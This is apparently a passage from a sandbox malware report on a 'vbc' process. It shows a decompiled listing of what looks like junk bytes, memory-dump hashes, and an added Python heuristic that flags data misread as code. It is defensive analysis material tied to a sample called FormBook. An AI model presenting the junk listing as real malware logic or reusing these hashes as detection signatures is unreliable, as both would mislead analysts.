      				if (_t519 != 0) goto L13;
      				 *_t403 =  *_t403 + _t403;
      				 *_t403 =  *_t403 + _t403;
      				_t404 = _t403 +  *_t403;
      				_t453 =  *_t404;
      				 *_t404 = _t452;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *((intOrPtr*)(_t404 + _t404 - 0x80)) =  *((intOrPtr*)(_t404 + _t404 - 0x80)) + _t453;
      				 *_t404 =  *_t404 + _t404;
      				 *_t481 =  *_t481 + _t519;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *0x70007a01 =  *0x70007a01 + _t453;
      				 *_t404 =  *_t404 + _t404;
      				 *_t404 =  *_t404 + _t404;
      				_t405 = _t404 +  *_t404;
      				 *_t481 = 0xf1;
      				_push(ss);
      				asm("rol dword [ecx], 1");
      				if (_t405 <= 0) goto L14;
      				_t406 = _t405;
      				 *_t406 =  *_t406 + _t406;
      				 *0x70007a01 =  *0x70007a01 + _t519;
      				_t407 = _t406 + _t453;
      				_push(ss);
      				asm("xlatb");
      				 *_t407 =  *_t407 + _t407;
      				 *_t453 =  *_t453 + _t407;
      				 *0x0B0EDD19 =  *((intOrPtr*)(0xb0edd19)) + _t407;
      				 *((intOrPtr*)(_t519 + 0x38a800)) =  *((intOrPtr*)(_t519 + 0x38a800)) + _t407;
      				 *_t407 =  *_t407 + _t407;
      				 *_t481 =  *_t481 + _t519;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *((intOrPtr*)(_t407 + _t407)) =  *((intOrPtr*)(_t407 + _t407)) + _t407;
      				_t408 = _t407 +  *_t407;
      				 *_t481 = 0xf1;
      				asm("loop 0x3");
      				 *_t408 =  *_t408 >> 0;
      				 *_t408 =  &(_t408[ *_t408]);
      				 *0x70007a01 =  *0x70007a01 + _t519;
      				_t520 = _t519 + _t408;
      				ss = ss;
      				goto 0xd033e7e4;
      				 *_t408 =  &(_t408[ *_t408]);
      				 *0x70007a01 =  *0x70007a01 + _t520;
      				_push(ss);
      				_t409 =  &(_t408[_t453]);
      				_push(ss);
      				goto 0x33eaf2;
      				 *_t409 =  *_t409 + _t409;
      				 *_t453 =  *_t453 + _t409;
      				 *((intOrPtr*)(0xb0edd19)) =  *((intOrPtr*)(0xb0edd19)) + _t409;
      				 *((intOrPtr*)(_t559 + 0x38e000)) =  *((intOrPtr*)(_t559 + 0x38e000)) + _t481;
      				 *_t409 =  *_t409 + _t409;
      				 *_t481 =  *_t481 + _t520;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t538 =  *_t538 + _t481;
      				 *_t453 =  *_t453 + _t409;
      				_t521 = _t520 + _t409;
      				_t482 = _t481 + 0x70007a01;
      				_push(ss);
      				if(_t482 == 0) {
      					_pop( *__eax);
      				}
      				_t410 = _t409 + _t453;
      				 *_t410 =  *_t410 + _t410;
      				 *_t557 =  *_t557 + _t521;
      				_t411 = _t410 + _t453;
      				_push(ss);
      				 *_t482 =  *_t482 + 0x90;
      				 *_t411 =  *_t411 + _t411;
      				 *_t411 =  *_t411 + _t411;
      				 *_t453 =  *_t453 + _t411;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t411;
      				 *((intOrPtr*)(_t482 + 0x390800)) =  *((intOrPtr*)(_t482 + 0x390800)) + _t521;
      				 *_t411 =  *_t411 + _t411;
      				 *_t482 =  *_t482 + _t521;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t453 =  *_t453 + _t521;
      				 *_t453 =  *_t453 + _t411;
      				_t522 = _t521 + _t411;
      				_t483 = _t482 + _t557;
      				_push(ss);
      				asm("cli");
      				 *((intOrPtr*)(_t453 + 0x392000)) =  *((intOrPtr*)(_t453 + 0x392000)) + _t522;
      				 *_t411 =  *_t411 + _t411;
      				 *_t557 =  *_t557 + _t522;
      				_t412 = _t411 + _t453;
      				_push(ss);
      				_t454 = _t453 +  *_t483;
      				 *_t454 =  *_t454 + _t412;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t412;
      				 *((intOrPtr*)(_t538 + 0x393400)) =  *((intOrPtr*)(_t538 + 0x393400)) + _t454;
      				 *_t412 =  *_t412 + _t412;
      				 *_t483 =  *_t483 + _t522;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t483 =  *_t483 + _t412;
      				 *_t454 =  *_t454 + _t412;
      				_t523 = _t522 + _t412;
      				_t484 = _t483 + _t557;
      				ss = ss;
      				_t413 = _t412 +  *((intOrPtr*)(_t484 + 0x394c00));
      				 *_t413 =  *_t413 + _t413;
      				 *_t557 =  *_t557 + _t523;
      				_t524 = _t523 + _t413;
      				ss = es;
      				asm("sbb eax, 0x5c00a202");
      				 *_t413 =  *_t413 + _t413;
      				 *((intOrPtr*)(_t454 + 0x23171a00)) =  *((intOrPtr*)(_t454 + 0x23171a00)) + _t524;
      				_t414 = _t413 +  *_t454;
      				 *_t454 =  *_t454 + _t414;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t414;
      				 *((intOrPtr*)(_t414 + _t414 + 0x3964)) =  *((intOrPtr*)(_t414 + _t414 + 0x3964)) + _t414;
      				 *_t414 =  *_t414 + _t414;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t415 = _t414 |  *_t414;
      				asm("cmpsb");
      				 *_t415 =  *_t415 + _t415;
      				 *_t415 =  *_t415 + _t415;
      				 *_t454 =  *_t454 + _t415;
      				_t525 = _t524 + _t415;
      				_t485 = _t484 + _t557;
      				_push(ss);
      				 *_t525 =  *_t525 ^ _t415;
      				asm("cmpsb");
      				 *((intOrPtr*)(_t485 + _t538)) =  *((intOrPtr*)(_t485 + _t538)) + _t454;
      				 *_t415 =  *_t415 + _t415;
      				 *_t557 =  *_t557 + _t525;
      				_t416 = _t415 + _t454;
      				_push(ss);
      				asm("stosb");
      				 *_t416 =  *_t416 + _t416;
      				 *_t416 =  *_t416 + _t416;
      				 *_t454 =  *_t454 + _t416;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t416;
      				 *((intOrPtr*)(_t557 + 0x398c00)) =  *((intOrPtr*)(_t557 + 0x398c00)) + _t485;
      				 *_t416 =  *_t416 + _t416;
      				 *_t485 =  *_t485 + _t525;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t416 = _t525 +  *_t416;
      				 *_t454 =  *_t454 + _t416;
      				_t487 = _t485 + _t557 - 1;
      				_t527 = _t525 + _t416 +  *((intOrPtr*)(_t416 + 0x39a400));
      				 *_t416 =  *_t416 + _t416;
      				 *_t557 =  *_t557 + _t527;
      				ss = ss;
      				_t539 = _t538 - 1;
      				_t529 = _t527 + _t416 +  *((intOrPtr*)(_t487 + 0x39b400));
      				 *_t416 =  *_t416 + _t416;
      				 *((intOrPtr*)(_t454 + 0x55171a00)) =  *((intOrPtr*)(_t454 + 0x55171a00)) + _t529;
      				_t530 = _t529 +  *((intOrPtr*)(_t529 + 0x39bc00));
      				 *_t416 =  *_t416 + _t416;
      				 *((intOrPtr*)(_t454 + 0x5b180800)) =  *((intOrPtr*)(_t454 + 0x5b180800)) + _t530;
      				 *_t454 =  *_t454 + _t416;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t416;
      				 *((intOrPtr*)(_t416 + _t416 + 0x39c0)) =  *((intOrPtr*)(_t416 + _t416 + 0x39c0)) + _t530 +  *_t454;
      				 *_t416 =  *_t416 + _t416;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t417 = _t416 |  *_t416;
      				 *_t417 =  *_t417 + _t417;
      				 *_t417 =  *_t417 + _t417;
      				_t418 = _t417 +  *_t417;
      				 *_t487 = 0xf1;
      				asm("o16 add dh, [esi+0x39d800]");
      				 *_t418 =  *_t418 + _t418;
      				 *_t557 =  *_t557;
      				_t533 = 0 + _t418;
      				ss = ss;
      				asm("insb");
      				_t455 = _t454 +  *_t418;
      				 *_t455 =  *_t455 + _t418;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t418;
      				 *((intOrPtr*)(_t533 + 0x39e800)) =  *((intOrPtr*)(_t533 + 0x39e800)) + _t455;
      				 *_t418 =  *_t418 + _t418;
      				 *_t487 =  *_t487 + _t533;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *((intOrPtr*)(_t418 + _t418)) =  *((intOrPtr*)(_t418 + _t418)) + _t455;
      				_t419 = _t418 +  *_t418;
      				 *_t487 = 0xf1;
      				_push(ss);
      				if(_t419 <= 0) {
      				}
      				 *_t533 =  *_t533 + _t455;
      				 *_t419 =  *_t419 + _t419;
      				 *_t419 =  *_t419 + _t419;
      				_t534 = _t533 + _t419;
      				ss = ss;
      				if(_t534 > 0) {
      					_t557 = 0x3a1000;
      				}
      				asm("adc [edx], bh");
      				 *_t419 =  *_t419 + _t419;
      				 *_t419 =  *_t419 + _t419;
      				_t420 = _t455;
      				_t456 = _t419;
      				 *((intOrPtr*)(_t539 + _t534)) =  *((intOrPtr*)(_t539 + _t534)) + _t456;
      				 *_t487 =  *_t487 + _t420;
      				asm("rol byte [eax], 0x0");
      				 *_t420 =  *_t420 + _t420;
      				 *_t456 =  *_t456 + _t420;
      				 *((intOrPtr*)(_t557 - 0x64f19ce8)) =  *((intOrPtr*)(_t557 - 0x64f19ce8)) + _t420;
      				_t421 = _t420 + _t420;
      				 *_t421 =  *_t421 + _t456;
      				 *_t421 =  *_t421 + _t421;
      				 *_t487 =  *_t487 + _t534;
      				asm("sbb [esi+ecx+0xa], bl");
      				_push(cs);
      				return _t421 |  *_t421;
      			}

      Instruction addresses (address column of the decompiled listing above): 0x003358d3 to 0x003362ca

      Memory Dump Source
      • Source File: 00000004.00000002.961501476.0000000000302000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true
      • Associated: 00000004.00000002.961497133.0000000000300000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000004.00000002.961527489.000000000033C000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_300000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a8d06199f755a183e1f012acaaa6e3f92452c88391cc2a0f072765b5cd8c3806
      • Instruction ID: 9c15bbd72fe12f3a96b6ec24e85af5f4c838358c2090e2a1477e06f2449dd2e0
      • Opcode Fuzzy Hash: a8d06199f755a183e1f012acaaa6e3f92452c88391cc2a0f072765b5cd8c3806
      • Instruction Fuzzy Hash: 5F72D96654E3E19FCB138B348CB56917FB0AE0322471E46DBC8C5CF4A3D229984AD763
      Uniqueness

      Uniqueness Score: -1.00%
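The function above decompiles almost entirely to `*p = *p + reg` statements with `aaa`, `das`, `arpl` and `wait` scattered between them. That is the shape a decompiler produces when it walks zero-filled or non-code bytes: `00 00` encodes `add [eax], al` and `01 00` encodes `add [eax], eax`, and the BCD and segment-descriptor opcodes never appear in compiler output. Before trusting the opcode or instruction fuzzy hashes of such a region, a practitioner would check whether it is plausibly code at all. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. The opcode values are x86 encodings; the byte-level scan (no real disassembler is used) and the 0.30 threshold are assumptions chosen for illustration, and both byte samples are constructed, not taken from the dump.

```python
"""Heuristic triage: does a byte region look like x86 code, or like data that a
decompiler has walked over?  Added example, not Joe Sandbox code.  The scan is
byte-level (no disassembler) and the threshold is an illustrative assumption."""
from collections import Counter

# Single-byte opcodes that compilers essentially never emit in 32-bit code but
# that appear constantly when data is decoded as code (values are x86 facts).
JUNK_OPCODES = {
    0x27: "daa", 0x2F: "das", 0x37: "aaa", 0x3F: "aas",
    0x63: "arpl", 0x9B: "wait", 0xD6: "salc", 0xF1: "int1",
}
ADD_PAIR = "add [eax], al/eax"   # 00 00 and 01 00, the dominant pattern above


def marker_counts(data: bytes) -> Counter:
    """Count junk markers in `data`: zero-ish `add [eax], ...` pairs and junk opcodes."""
    counts = Counter()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0x00, 0x01) and i + 1 < len(data) and data[i + 1] == 0x00:
            counts[ADD_PAIR] += 1
            i += 2                      # the pair is one two-byte instruction
            continue
        if b in JUNK_OPCODES:
            counts[JUNK_OPCODES[b]] += 1
        i += 1
    return counts


def junk_ratio(data: bytes) -> float:
    """Fraction of bytes consumed by junk markers (0.0 for an empty region)."""
    if not data:
        return 0.0
    c = marker_counts(data)
    junk_bytes = 2 * c[ADD_PAIR] + sum(n for name, n in c.items() if name != ADD_PAIR)
    return junk_bytes / len(data)


def looks_like_data(data: bytes, threshold: float = 0.30) -> bool:
    """Assumed cut-off: real code carries some zero bytes in immediates and
    displacements, so a low ratio is normal; a region dominated by junk is not."""
    return junk_ratio(data) >= threshold


def triage(label: str, data: bytes, threshold: float = 0.30) -> str:
    """One-line verdict suitable for annotating a dump region."""
    ratio = junk_ratio(data)
    verdict = ("likely data or padding, treat the decompilation as noise"
               if ratio >= threshold else "plausibly code")
    return f"{label}: {len(data)} bytes, junk ratio {ratio:.2f}, {verdict}"


# Constructed sample 1: mimics the listing above (add pairs, das, aaa, arpl, wait,
# push ss/cs, adc).  Not bytes from the actual dump.
JUNK_SAMPLE = bytes.fromhex(
    "00 00 01 00 2F 01 00 33 37 00 00 00 00 16 00 00"
    "00 01 00 37 00 00 00 00 13 0E 00 00 00 00 63 9B"
)

# Constructed sample 2: a plausible prologue with a push imm32 and a call,
# so it contains zero bytes the way real code does.
CODE_SAMPLE = bytes.fromhex(
    "55 8B EC 83 EC 10 53 56 57 8B 7D 08 33 C0"
    "68 00 10 00 00 E8 00 00 00 00 85 C0 74 05 5F 5E 5B C9 C3"
)

if __name__ == "__main__":
    print(triage("junk-like region", JUNK_SAMPLE))
    print(triage("code-like region", CODE_SAMPLE))
    print(dict(marker_counts(JUNK_SAMPLE)))
```

Run against a region carved from the 0x300000 dump, a ratio near the junk sample's tells you the fuzzy hashes above describe padding or data rather than FormBook logic, so they should not be used as detection signatures; a ratio near the code sample's is the normal background level of zero bytes in immediates and is no cause for concern.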

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cef5d863a616033851dd14e9a7946e4380d9a7cd4559865e29d1fbbd0cca226c
      • Instruction ID: 7a20229436c843f58b7b91654e65af1a89542162ee1254b0cad1b38d3913f4e5
      • Opcode Fuzzy Hash: cef5d863a616033851dd14e9a7946e4380d9a7cd4559865e29d1fbbd0cca226c
      • Instruction Fuzzy Hash: FC02D275A00218DFDB15CFA5C980E9DBBB2FF49304F1580A9E509AB272DB31D9A5DF10
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 32b3c5768f6c9c38db8592997b7bfd52a0c5fa257b54b04a4fbd126a270e3cee
      • Instruction ID: 3fccc6abbe745f0d0ddc5d6b01675445d0f82c067bcd50870c0d8f28a7545fec
      • Opcode Fuzzy Hash: 32b3c5768f6c9c38db8592997b7bfd52a0c5fa257b54b04a4fbd126a270e3cee
      • Instruction Fuzzy Hash: 53614D6190E3D54FD7078B359C696C67FB1AF53244F4A80EBC488DB1A3E678095ACB22
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5b46ad4eedaab83b67fcb82974a9e95d1ca9c0f3eca4fd53d6e7c0ee99812df7
      • Instruction ID: 60d473d9a42dd03f57b5d2ea8a0bd95b9df6fa31e2f2184fe2227a5bab11d520
      • Opcode Fuzzy Hash: 5b46ad4eedaab83b67fcb82974a9e95d1ca9c0f3eca4fd53d6e7c0ee99812df7
      • Instruction Fuzzy Hash: 8551C675E042588FDB18CFA6D940ADDBBF2BF89300F14C1BAD509AB255EB305A55CF50
      Uniqueness

      Uniqueness Score: -1.00%